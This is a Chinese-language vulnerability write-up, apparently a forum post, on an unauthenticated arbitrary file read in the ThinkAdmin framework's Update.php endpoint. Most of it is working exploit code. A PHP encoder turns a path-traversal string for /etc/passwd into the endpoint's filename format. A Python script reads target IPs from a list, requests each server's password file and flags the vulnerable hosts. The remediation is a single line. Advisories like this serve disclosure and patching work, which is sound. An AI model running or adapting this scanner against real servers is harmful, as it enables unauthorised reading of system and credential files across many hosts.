ThinkAdmin简介
ThinkAdmin 是一款基于最新 ThinkPHP V6 开发的后台管理框架,使用最宽松的MIT协议开源。项目依赖自制组件ThinkLibrary v6,其中封装了大量常用操作,可快速开发常规CURD应用,且不影响原ThinkPHP生态;框架非常适用于二次快速开发。 项目地址:https://github.com/zoujingli/ThinkAdmin
漏洞成因
app/admin/controller/api/Update.php存在未授权访问,当用户构造符合规则的filename时可实现任意文件读取。
影响范围
ThinkAdmin版本 ≤ 2020.08.03.01
漏洞复现
使用php脚本生成编码后符合规则的文件名。
<?php
function encode($content) {
//加密正常文件名
list($chars, $length) = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT',$content))];
//加密中文文件名
//list($chars, $length) = ['', strlen($string = iconv('UTF-8', 'GB2312', $content))];
for ($i = 0; $i < $length; $i++)
$chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0);
return $chars;
}
$content="../../../etc/passwd";
echo encode($content);
?>
访问Update.php,传入构造的参数,若能返回base64编码后的内容,则证明漏洞存在。
POC
import requests
import json
import base64
requests.packages.urllib3.disable_warnings()
heard = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763",
"Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language" : "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding" : "gzip, deflate",
"Connection" : "close",
"Upgrade-Insecure-Requests" : "1"
}
res = open("ip.txt","r")
for ip in res.readlines():
url ="http://"+ ip.strip()+"/admin/login.html?s=admin/api.Update/get/encode/1b2r33322u2x2v1b2s2p382p2q2p372t1a342w34"
try:
request = requests.get(url=url, headers=heard, verify=False, timeout=3)
try:
rep = base64.b64decode(json.loads(request.text)['data']['content'])
if "password" in str(rep):
print("[+]"+ip.strip()+"存在任意文件读取漏洞")
else:
print("[-]"+ip.strip()+"不存在任意文件读取漏洞")
except:
pass
except:
pass
漏洞修复
下载最新版Think Admin框架即可。
请登录后查看回复内容